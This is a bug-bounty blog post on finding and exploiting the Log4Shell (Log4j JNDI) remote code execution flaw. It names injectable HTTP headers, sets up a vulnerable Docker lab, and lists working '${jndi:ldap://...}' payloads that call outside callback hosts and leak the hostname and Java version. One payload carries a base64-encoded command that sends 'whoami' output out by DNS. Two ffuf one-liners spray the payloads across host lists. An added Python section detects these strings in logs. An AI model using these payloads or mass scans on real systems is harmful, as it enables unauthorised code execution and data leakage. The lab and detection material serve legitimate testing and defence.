How to find Log4shell & Exploit it - BugBounty

Yes, I know, everybody wants to wash their hands in this flood. So I will share some tricks for finding the Log4j RCE in vulnerable web applications.


What is Log4j?

Log4j is a popular Java logging library used by many of the Java applications available on the internet. For more details, read this.


Where can you find this?

Any application that uses Java and the Log4j library can be exploited, so you need to find input fields whose values the application logs. These are a few key areas to look at:-

User-Agent
X-Requested-For
X-Requested-With
Authentication-Bearer
X-Api-Version

For learning purposes

You can host a vulnerable application on your system to learn how to exploit it.

Requirements:-

  • Run the vulnerable app in Docker:

sudo docker run -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app

  • Generate a Canarytokens token, or use Burp Collaborator instead.

  1. Select DNS token -> Enter your email -> Write anything in the reminder.

Steps to exploit:-

  • Open the vulnerable app in Burp Suite Repeater

  • Add this header with your canary token payload: `X-Api-Version: ${jndi:ldap://yourtoken.canarytokens.com/a}`

  • Check your mail

For impact try these payloads:-

${jndi:ldap://x${hostName}.L4J.yourtoken.canarytokens.com/a}
${jndi:ldap://${hostName}.§§.${sys:java.version}.yourtoken.burpcollaborator.net}
${jndi:ldap://dm3v6xcr9b9d0gkcut2rd0s84zaqyf.burpcollaborator.net/Basic/Command/Base64/cGluZyBgd2hvYW1pYC5kbTN2NnhjcjliOWQwZ2tjdXQycmQwczg0emFxeWYuYnVycGNvbGxhYm9yYXRvci5uZXQ=}
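
Added example (not from the original post): the header payloads above leave a recognizable string in whatever the application logs, so the same patterns can drive detection. This Python function scans request headers for `${jndi:...}` lookups and reports the callback host plus any nested lookups (such as `${hostName}`) whose values would leak through the DNS name. `inspect_headers`, the finding fields and the `example.test` domains are assumptions made for the example.

```python
import re

# ${jndi:<scheme>://<authority>...}; the authority may contain nested ${...} lookups.
JNDI = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<authority>(?:\$\{[^{}]*\}|[^/${}])+)",
    re.IGNORECASE,
)
NESTED = re.compile(r"\$\{([^{}]+)\}")


def inspect_headers(headers):
    """Return one finding per header whose value carries a JNDI lookup string."""
    findings = []
    for name, value in headers.items():
        m = JNDI.search(value)
        if not m:
            continue
        authority = m.group("authority")
        findings.append({
            "header": name,
            "scheme": m.group("scheme").lower(),
            # Callback host with nested lookups masked: usable for egress
            # blocking and for pivoting into DNS resolver logs.
            "callback": NESTED.sub("*", authority),
            # Nested lookups are values the server would resolve and place
            # in the DNS name, i.e. what the request tries to leak.
            "leaks": NESTED.findall(authority),
        })
    return findings


# Constructed sample requests with placeholder domains, not captured traffic.
SAMPLES = [
    {"User-Agent": "Mozilla/5.0",
     "X-Api-Version": "${jndi:ldap://token.example.test/a}"},
    {"User-Agent": "${jndi:ldap://x${hostName}.L4J.token.example.test/a}"},
    {"X-Api-Version":
     "${jndi:ldap://${hostName}.${sys:java.version}.token.example.test}"},
    {"User-Agent": "curl/8.0", "X-Api-Version": "2"},
]

if __name__ == "__main__":
    for number, request in enumerate(SAMPLES):
        for finding in inspect_headers(request):
            print(number, finding)
```

This matches only the plain form of the lookup shown on this page; run it against the header values your proxy or application actually logs.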



For Automation

There are many tools available on GitHub for scanning for this CVE. These are some of the best:-

~/go/bin/ffuf -w "$1"/dirs.txt -u FUZZ -H 'User-agent: ${jndi:ldap://yourtoken.canarytokens.com/a}' -H 'X-Api-Version: ${jndi:ldap://yourtoken.canarytokens.com/a}' -H 'X-Requested-For: ${jndi:ldap://yourtoken.canarytokens.com/a}' -H 'X-Requested-With: ${jndi:ldap://yourtoken.canarytokens.com/a}' -H 'Authentication-Bearer: ${jndi:ldap://yourtoken.canarytokens.com/a}'


ffuf -w httpx.txt -u FUZZ -H 'HEADERS: ${jndi:ldap://test.burpcollab.com/a}' -w lowercase-headers:HEADERS

If you have an application with many features, then a manual approach is best for finding this.





